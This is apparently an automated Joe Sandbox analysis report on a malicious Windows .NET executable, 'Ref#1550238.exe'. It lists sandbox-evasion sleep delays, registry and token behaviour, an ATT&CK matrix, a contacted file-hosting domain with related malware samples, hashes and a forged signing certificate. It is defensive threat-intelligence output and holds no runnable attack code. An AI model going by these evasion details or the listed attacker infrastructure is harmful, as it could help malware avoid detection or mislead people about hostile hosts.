Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeMemory allocated: 15E0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeMemory allocated: 3210000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeWindow / User API: threadDelayed 2592Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeWindow / User API: threadDelayed 7196Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep count: 38 > 30Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -35048813740048126s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -100000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -99859s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7584Thread sleep count: 2592 > 30Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7588Thread sleep count: 7196 > 30Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -99749s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -99640s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -99531s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -99422s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -99304s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -99187s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -99078s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -98968s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -98858s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -98750s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -98604s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -98497s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -98387s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -98276s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -98171s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -98039s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -97916s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -97812s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -97703s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -97592s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -97484s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -97375s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -97265s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -97155s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -97046s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -96937s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -96828s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -96718s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -96609s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -96500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -96390s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -96281s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -96172s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -96062s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95953s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95840s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95734s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95624s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95491s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95273s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95157s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -95000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -94890s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -94781s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -94672s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -94547s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -94437s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exe TID: 7552Thread sleep time: -94328s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99859Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99749Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99640Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99531Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99422Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99304Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99187Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 99078Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98968Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98858Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98750Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98604Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98497Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98387Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98276Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98171Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 98039Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97916Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97812Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97703Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97592Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97484Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97375Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97265Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97155Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 97046Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96937Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96828Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96718Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96609Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96500Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96390Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96281Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96172Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 96062Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95953Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95840Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95734Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95624Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95491Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95273Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95157Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 95000Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 94890Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 94781Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 94672Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 94547Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 94437Jump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeThread delayed: delay time: 94328Jump to behavior
Source: Ref#1550238.exe, 00000000.00000002.3741306291.0000000001465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Ref#1550238.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Users\user\Desktop\Ref#1550238.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Ref#1550238.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
OS Credential Dumping1
Query Registry
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
Virtualization/Sandbox Evasion
LSASS Memory1
Security Software Discovery
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets12
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Ref#1550238.exe45%ReversingLabsWin32.Trojan.Generic
Ref#1550238.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://oshi.at0%Avira URL Cloudsafe
https://oshi.at/EqqP0%Avira URL Cloudsafe
https://oshi.at0%Avira URL Cloudsafe
http://oshi.atd0%Avira URL Cloudsafe
https://oshi.atD0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
oshi.at
5.253.86.15
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://oshi.at/EqqPfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0Ref#1550238.exefalse
      high
      http://oshi.atdRef#1550238.exe, 00000000.00000002.3741808265.0000000003349000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000337E000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000329C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000032ED000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://crl.mRef#1550238.exe, 00000000.00000002.3743212803.0000000006E6F000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://crls.ssl.com/ssl.com-rsa-RootCA.crl0Ref#1550238.exefalse
          high
          http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0Ref#1550238.exefalse
            high
            http://oshi.atRef#1550238.exe, 00000000.00000002.3741808265.0000000003349000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000337E000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000329C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000032ED000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.ssl.com/repository0Ref#1550238.exefalse
              high
              http://ocsps.ssl.com0?Ref#1550238.exefalse
                high
                http://ocsps.ssl.com0_Ref#1550238.exefalse
                  high
                  http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0Ref#1550238.exefalse
                    high
                    https://oshi.atRef#1550238.exe, 00000000.00000002.3741808265.0000000003285000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0QRef#1550238.exefalse
                      high
                      http://ocsps.ssl.com0Ref#1550238.exefalse
                        high
                        http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0Ref#1550238.exefalse
                          high
                          http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0Ref#1550238.exefalse
                            high
                            https://oshi.atDRef#1550238.exe, 00000000.00000002.3741808265.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.0000000003349000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000337E000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.000000000336C000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Ref#1550238.exe, 00000000.00000002.3741808265.00000000032ED000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRef#1550238.exe, 00000000.00000002.3741808265.0000000003285000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0Ref#1550238.exefalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                5.253.86.15
                                oshi.atCyprus
                                208046HOSTSLICK-GERMANYNLfalse
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1567423
                                Start date and time:2024-12-03 15:07:22 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 44s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:8
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Ref#1550238.exe
                                Detection:MAL
                                Classification:mal56.winEXE@1/0@1/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 95%
                                • Number of executed functions: 16
                                • Number of non-executed functions: 6
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): ocsps.ssl.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: Ref#1550238.exe
                                TimeTypeDescription
                                09:08:20API Interceptor10683206x Sleep call for process: Ref#1550238.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                5.253.86.15JuneOrder.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                  TamenuV11.msiGet hashmaliciousUnknownBrowse
                                    9K25QyJ4hA.exeGet hashmaliciousUnknownBrowse
                                      9K25QyJ4hA.exeGet hashmaliciousUnknownBrowse
                                        PAYMENT_RECEIPT_STAN100699.exeGet hashmaliciousUnknownBrowse
                                          PAYMENT_RECEIPT_STAN100699.exeGet hashmaliciousUnknownBrowse
                                            VGuSHbkIxk.exeGet hashmaliciousAmadey, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                              wauCcRjr6j.exeGet hashmaliciousDjvu, RedLine, SmokeLoaderBrowse
                                                KvVXVfYvlF.exeGet hashmaliciousBlackGuard, SmokeLoaderBrowse
                                                  BHHh.exeGet hashmaliciousUnknownBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    oshi.atSwift Payment MT103.lnkGet hashmaliciousUnknownBrowse
                                                    • 188.241.120.6
                                                    Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                    • 188.241.120.6
                                                    Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                    • 188.241.120.6
                                                    KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                    • 194.15.112.248
                                                    KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                    • 194.15.112.248
                                                    JuneOrder.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                    • 5.253.86.15
                                                    Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                    • 194.15.112.248
                                                    jdconstructnOrderfdp..exeGet hashmaliciousBabadeda, PureLog Stealer, Quasar, zgRATBrowse
                                                    • 188.241.120.6
                                                    TamenuV11.msiGet hashmaliciousUnknownBrowse
                                                    • 5.253.86.15
                                                    Setup 3.0.0.msiGet hashmaliciousUnknownBrowse
                                                    • 188.241.120.6
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    HOSTSLICK-GERMANYNLan_api.exeGet hashmaliciousUnknownBrowse
                                                    • 193.142.146.64
                                                    licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                    • 193.142.146.64
                                                    an_api.exeGet hashmaliciousUnknownBrowse
                                                    • 193.142.146.64
                                                    build.exeGet hashmaliciousUnknownBrowse
                                                    • 193.142.146.64
                                                    ub16vsLP6y.zipGet hashmaliciousRemcosBrowse
                                                    • 193.142.146.203
                                                    ISehgzqm2V.zipGet hashmaliciousRemcosBrowse
                                                    • 193.142.146.203
                                                    Form-8879_PDF.jarGet hashmaliciousUnknownBrowse
                                                    • 193.142.146.64
                                                    Form-8879_PDF.jarGet hashmaliciousUnknownBrowse
                                                    • 193.142.146.64
                                                    bot_library.exeGet hashmaliciousUnknownBrowse
                                                    • 193.142.146.43
                                                    SecuriteInfo.com.ELF.Mirai-CQT.17542.12898.elfGet hashmaliciousMiraiBrowse
                                                    • 193.142.146.10
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0eBestellung - 021224 - 901003637.exeGet hashmaliciousQuasarBrowse
                                                    • 5.253.86.15
                                                    Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 5.253.86.15
                                                    NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    • 5.253.86.15
                                                    1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                    • 5.253.86.15
                                                    https://nam05.safelinks.protection.outlook.com.url.atp-redirect.protected-forms.com/XTnQrajg1OGVHZkdSZC9jY09NbW40Z2plNHVuWDhsQVZRZkFYNVBxOWlTekFXSXBLSVRWLyt2WXhuS1hGNVo3UUxGQTRLRVpXNHpLSjVKdDEvbHJLSmtFWjMzbFIxb3IvR2xvdWJ1em5yeTJBK1FXdzF3UG52YXBaVmJBSEJZcXBSdjFvMTh6TmplRHV4azZ6UHkrTnM5dUY2QmVzbVFVRWk5di9PMEZxZ2lXNnM5N2tuOExqN1pyUy0tcEx5Q0xXTTBEOURyNFdnTS0tTTJJM3JGT2w2ZzQxTnorb2NMd1lrZz09?cid=2305347406Get hashmaliciousKnowBe4Browse
                                                    • 5.253.86.15
                                                    kjsdhf243kj2.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                    • 5.253.86.15
                                                    kjsdfhsdHndf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                    • 5.253.86.15
                                                    hkjsdhf01.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                    • 5.253.86.15
                                                    kjshdfj_ksdf02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                    • 5.253.86.15
                                                    No context
                                                    No created / dropped files found
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):5.691852920088672
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Ref#1550238.exe
                                                    File size:348'128 bytes
                                                    MD5:a31bcf203bb60f13de83211ac9d44d06
                                                    SHA1:8d559c68b94f38e6886f467080cbce53a2ae1654
                                                    SHA256:bd35a1c3b410026617e27fa3937f77f1a42ada6978afc36022e75c63677f897d
                                                    SHA512:6404465ccf7dcbc3bcd985e68034f5c8cbc926db719397d05b3af50f9e5554cb1757080038ea7d26b451aed8c90f7d83894c1984995fff6f87bc077ad56a3b50
                                                    SSDEEP:3072:BbS0IEhKUQfHCj32o7wewfHHQoz5f8o/8Ck0cTIHXrrCbJSZ862M:9SYIWtw4W8y8cc03rObgSM
                                                    TLSH:F174840BF7C1D4D6DD407BB2F4974911A3A0EDC23A9FCE06295633D82D733A7698618A
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....-Ng.............................=... ...@....@.. ....................................`................................
                                                    Icon Hash:b04a484c4c4a4eb0
                                                    Entrypoint:0x443dee
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x674E2DDC [Mon Dec 2 21:59:56 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Signature Valid:false
                                                    Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                    Signature Validation Error:The digital signature of the object did not verify
                                                    Error Number:-2146869232
                                                    Not Before, Not After
                                                    • 04/07/2024 00:35:32 15/05/2027 11:15:04
                                                    Subject Chain
                                                    • OID.1.3.6.1.4.1.311.60.2.1.3=VN, OID.2.5.4.15=Private Organization, CN="DUC FABULOUS CO.,LTD", SERIALNUMBER=0105838409, O="DUC FABULOUS CO.,LTD", L=Hanoi, C=VN
                                                    Version:3
                                                    Thumbprint MD5:FF0E889D2A73C3A679605952D35452DC
                                                    Thumbprint SHA-1:2C1D12F8BBE0827400A8440AF74FFFA8DCC8097C
